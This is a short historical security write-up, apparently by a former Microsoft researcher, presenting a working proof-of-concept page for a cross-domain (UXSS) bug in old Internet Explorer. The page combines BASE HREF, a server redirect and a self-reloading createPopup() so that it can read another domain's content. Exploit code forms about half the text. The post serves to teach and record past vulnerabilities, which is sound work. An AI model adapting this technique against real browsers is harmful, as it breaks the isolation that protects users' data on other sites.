UXSS Using BaseHref Redirect and createPopup

This variation doesn’t use the mhtml: protocol at all. Instead, it relies on the <BASE HREF> tag pointing to a server-side redirect. A createPopup() that reloads itself inherits the redirected origin, collapsing the domain boundary. At least one pixel of the popup needs to be visible on screen for it to work — hiding it entirely with zero dimensions breaks the trick.

<HTML>
<HEAD>
<TITLE>xDomain using just BASE HREF and createPopup</TITLE>
<BASE HREF="http://sapo/redir/">
</HEAD>
<BODY>
<FONT FACE="Tahoma" SIZE="2">
This variation <b>is not using</b> the <u>mHTML</u> protocol.<BR>
The trick is mooooore or less similar to the xDomain variation of the LDY Spoof, but this time, it does not need the mHTML protocol
at all, so it has nothing to do with the patch for the mHTML. It still involves a server redirection.<BR><BR>
Differences with the other crossDomain:<BR>
1) No mHTML protocol used at all.<BR>
2) This one NEEDS to show the popUp in order to work. At least, one pixel of it (cPop.show(0,0,1,1)).
</FONT>
<SCRIPT>
var cPop=window.createPopup();
var doc=cPop.document;
doc.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';
cPop.show(0,300,200,200);
setTimeout("alert(doc.body.innerText)",5000);
</SCRIPT>
</BODY>
</HTML>

The <BASE HREF> repoints all relative navigation to the redirect server. When createPopup() calls location.reload() inside itself, the reload request goes through the base URL — and the redirect sends it to a different domain. The popup’s document then belongs to that other domain, but the parent page still holds a live reference to doc and can read its content. The server-side redirect file (redir1.asp) is part of the setup but not shown here.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.